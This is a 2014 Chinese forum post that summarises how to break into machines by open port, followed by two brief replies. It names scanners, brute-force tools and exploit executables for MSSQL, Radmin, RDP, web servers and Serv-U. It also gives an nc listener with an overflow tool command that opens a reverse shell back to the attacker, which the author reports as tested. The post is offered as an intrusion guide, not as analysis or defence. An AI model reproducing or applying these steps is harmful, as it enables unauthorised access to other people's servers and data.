KingSolomon 发表于 2014-6-4 03:04:23

【常见端口的入侵手法归纳】

  1. 1433端口 入侵
  scanport.exe 查有1433的机器
  SQLScanPass.exe 进行字典暴破(字典是关键)
  最后 SQLTools.exe 入侵
  =============================
  对sql的sp2及以下的系统,可用sql的hello 溢出 漏洞 入侵 。
  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵 ip 1433 本机ip 本机端口
  (以上反向的,测试成功)
  sqlhelloz.exe 入侵 ip 1433 (这个是正向连接)
  2. 4899端口入侵
  用4899过滤器.exe,扫描空口令的机器
  3. 3899的入侵
  对很早的机器,可以试试3389的 溢出 (win3389ex.exe)
  对2000的机器,可以试试字典暴破。(tscrack.exe)
  4. 80入侵
  对sp3以前的机器,可以用webdav入侵;
  对bbs 论坛 ,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
  可以利用SQL进行 注入 。(小榕的 注入 软件)。
  5. serv-u入侵(21端口)
  对5. 004及以下系统,可用 溢出 入侵。(serv5004.exe)
  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)
**** Hidden Message *****

像花儿一样 发表于 2017-11-9 15:18:24

谢谢分享!~

mafeipeng 发表于 2019-3-27 16:37:36

RE: 【常见端口的入侵手法归纳】 [修改]
页: [1]
查看完整版本: 【常见端口的入侵手法归纳】